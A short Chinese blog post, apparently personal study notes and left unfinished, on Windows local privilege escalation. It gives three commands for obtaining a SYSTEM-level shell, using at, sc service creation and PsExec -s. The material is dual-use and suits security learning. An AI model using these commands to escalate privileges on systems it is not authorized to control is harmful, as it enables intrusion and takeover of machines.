• 博客园Logo
  • 会员
  • 周边
  • 众包
  • 新闻
  • 博问
  • 闪存
  • 赞助商
    • 搜索
      所有博客
    • 搜索
      当前博客
  • 写随笔 我的博客 短消息 简洁模式
    用户头像
    我的博客 我的园子 账号设置 简洁模式 ... 退出登录
    注册 登录
lunaqueen
博客园    首页    新随笔    联系   管理    订阅  订阅

Windows本地提权

本文基于网络搜索以及苑老师视频编写,谢谢指导,如有侵权,烦请联系删除。

目录

  1. at提权
  2. sc提权
  3. psexec提权

1.at提权

at在低版本windows下可用,通过system权限在指定时间创建[(非)交互]任务。

 at <time> /interactive cmd     //at提权system

  然后再以system权限运行taskmgr(任务管理器),杀掉user的exploere(桌面环境),重新运行exploere即可获得system账户环境,此时系统便在system权限下运行。

 

2.sc提权

sc可在system权限下创建/启动服务,需要再启动。

 sc Create syscmd binPath= "cmd /k start" type= own type= interact

 

 

sc start syscmd    //启动该服务


whoami移动到C:\WINDOWS\system32进行身份验证:

 

 

 

 

3.psexec提权

psexec.exe包含在sysinternals-suite中。

PsExec.exe -i -s cmd      //interactive  system账户

 

待续......

posted @ 2021-11-28 14:38  lunaqueen  阅读(200)  评论(0)  编辑  收藏  举报
刷新页面返回顶部
Copyright © 2024 lunaqueen
Powered by .NET 9.0 on Kubernetes